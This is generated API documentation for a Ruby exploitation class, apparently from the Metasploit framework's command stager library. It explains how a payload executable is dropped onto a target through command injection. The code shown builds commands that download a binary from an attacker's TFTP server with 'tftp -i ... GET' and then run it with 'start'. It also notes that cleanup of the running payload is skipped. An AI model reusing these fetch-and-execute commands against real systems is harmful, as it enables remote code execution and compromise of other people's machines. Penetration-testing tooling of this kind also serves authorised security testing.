CmdStagerBase
This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.
This particular version uses tftp.exe to download a binary from the specified server. The original file is preserve, not encoded at all, and so this version is significantly simpler than other methods.
Requires: tftp.exe, outbound udp connectivity to a tftp server
Written by Joshua J. Drake
We override compress commands just to stick in a few extra commands last second..
# File lib/rex/exploitation/cmdstager/tftp.rb, line 41 def compress_commands(cmds, opts) # Initiate the download cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}" # Make it all happen cmds << "start #{@tempdir + @payload_exe}" # Clean up after unless requested not to.. if (not opts[:nodelete]) # XXX: We won't be able to delete the payload while it is running.. end super end
Generated with the Darkfish Rdoc Generator 2.